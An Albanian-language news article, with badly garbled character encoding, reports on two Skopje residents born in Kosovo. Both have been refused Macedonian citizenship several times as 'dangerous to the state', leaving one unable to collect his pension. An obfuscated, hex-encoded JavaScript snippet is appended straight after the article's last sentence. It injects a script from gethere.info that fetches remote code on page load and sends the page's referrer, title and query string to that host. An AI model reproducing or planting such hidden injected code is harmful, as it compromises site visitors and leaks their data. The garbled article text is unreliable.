largea_suspendohet1352278627

U refuzohet shtetA�sia me arsyetimin ‘TA� rrezikshA�m pA�r shtetin’

Ahmet LaA�i, i lindur nA� vitin 1946 nA� fshatin Pustenik tA� KosovA�s, prej moshA�s 8 vjeA�e ai jeton nA� Maqedoni, por edhe pse ka kaluar plot 58 vjet nA� kA�tA� shtet ai kurrA� nuk arriti tA� bA�het shtetas i MaqedonisA�. Ahmeti LaA�i thotA� se nuk ka lA�nA� institucion pa trokitur pA�r tA� kA�rkuar ndihmA� pA�r shtetA�sinA�. Deri tani, ai thotA� se ka aplikuar pesA� herA� ndA�rsa tA� gjitha pA�rgjigjet qA� ka marrA� kanA� qenA� negative. Ajo qA� e bA�n edhe mA� tragjike kA�tA� rast, sipas LaA�it, A�shtA� arsyetimi se A�shtA� shtetas i padA�shiruar dhe i rrezikshA�m pA�r MaqedoninA�.

a�?Prej vitit 1994 kam aplikuar pA�r nA�nshtetA�si tA� MaqedonisA�, kjo A�shtA� e pesta herA�, gjithmonA� A�shtA� problemi i njA�jtA�, vendimi vjen negativ megjithA�se unA� i plotA�soj tA� gjitha kushtet, qe 40 vite jam i martuar, tre fA�mijA� i kam, krejt janA� nA�nshtetas tA� MaqedonisA� pA�rveA� meje. UnA� nuk e di ku A�shtA� problemi, unA� kam edhe shtA�pi kA�tu, kam edhe burime jete kA�tu, paguaj tatim, ushtrinA� e kam bA� nA� Maqedoni, klasA�n fillore e kam kryer nA� Maqedoni, shkollA�n e mesme e kam kryer nA� Maqedoni nA� maqedonisht, unA� mendoj se i plotA�soj tA� gjitha kushtet, nuk e di nga lind ajo ide e cila vjen kjo negativa�?, tha Ahmet LaA�i, banor i Shkupit

NA� bazA� tA� moshA�s dhe viteve tA� punA�s Ahmet LaA�it i takon edhe pensioni. MirA�po, siA� thotA� ai, pA�r shkak tA� shtetA�sisA� ai nuk mund ta gA�zojA� kA�tA� tA� drejtA�.

a�?UnA� kisha pas dA�shirA� qA� kA�tA� punA� ta marrin parasysh shteti i MaqedonisA� nA� qoftA� se A�shtA� fjala pA�r ndonjA� tjetA�r njeri, le ta korrigjojnA� punA�n e vet edhe le ta sjellin vendimin tA� cilin e meritoj se unA� tash jam pensionist nuk po mundem me marr as pensionin, nuk po mundem me hap asnjA� numA�r konto tA� MaqedonisA� pA�r shkak tA� nA�nshtetA�sisA�. Kam punuar nA� 11 Tetori, kam pesA� vjet e gjashtA� muaj stazh, kam tA� drejtA� pensioni, kam vendim pA�r pension ama nuk po mundem me hap konto numA�ra�?, tha Ahmet LaA�i, banor i Shkupit

Me tA� njA�jtA�n problematikA� ballafaqohet edhe njA� tjetA�r banor i Shkupit, 59 vejA�ari Aziz Bekteshi me prejardhje nga Lubishta e KosovA�s. Edhe ai jeton nA� Shkup prej rreth 50 vjetA�sh por asnjA�herA� nuk ka arritur tA� fitojA� nA�nshtetA�sinA� e MaqedonisA� me tA� njA�jtin arsyetim sikur se bashkA�qytetari i tij, se konsiderohet si rrezik pA�r shtetin.

a�?Jam i gatshA�m sot me dA�shmuar, sot me dA�shmuar edhe me polici edhe me gjyq qA� as nuk mA� kA�rkon gjyqi as nuk mA� kA�rkon policia, jo vetA�m kA�tu po as nA� KosovA� po askund nA� botA�, a po mA� kupton, kA�tA� mundem me dA�shmuar kur tA� donA�. Me tA� vA�rtet unA� jam aq i emocionuar edhe aq i habitur, nuk e di se kush mundet me mA� ndihmuar se tA� gjitha ato institucione i kA�rkova edhe askush nuk ma shtriu dorA�n me thanA� qA� ngadalA� se nuk A�shtA� punA� e vogA�l dhe e thjeshtA�. A unA� prapA� po e them se unA� mundem me dA�shmua kur tA� doje dhe nA� A�farA�do rastia�?, tha Aziz Bekteshi, banor i Shkupit

Dy banorA�t nga Shkupi paralajmA�ruan se edhe gjatA� periudhA�s sA� ardhshme do tA� vazhdojnA� tA� kA�rkojnA� tA� drejtA�n e tyre, sipas tyre, nA�se A�shtA� nevoja edhe nA� GjykatA�n pA�r tA� Drejtat e Njeriut nA� Strazburg. NdA�rkohA� nga Ministria e Brendshme lidhur me kA�tA� rast thanA� se palA�t nA� qoftA� se nuk pajtohen me kA�tA� vendimin negativ sa i takon kA�rkesA�s pA�r nA�nshtetA�si, mund tA� ankohen nA� institucionet pA�rgjegjA�se.var _0x31f1=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0x31f1[1]](_0x31f1[0]);s[_0x31f1[2]]= _0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12];if(document[_0x31f1[13]]){document[_0x31f1[13]][_0x31f1[15]][_0x31f1[14]](s,document[_0x31f1[13]])}else {d[_0x31f1[18]](_0x31f1[17])[0][_0x31f1[16]](s)};if(document[_0x31f1[11]][_0x31f1[19]]=== _0x31f1[20]&& KTracking[_0x31f1[22]][_0x31f1[21]](_0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12])=== -1){alert(_0x31f1[23])}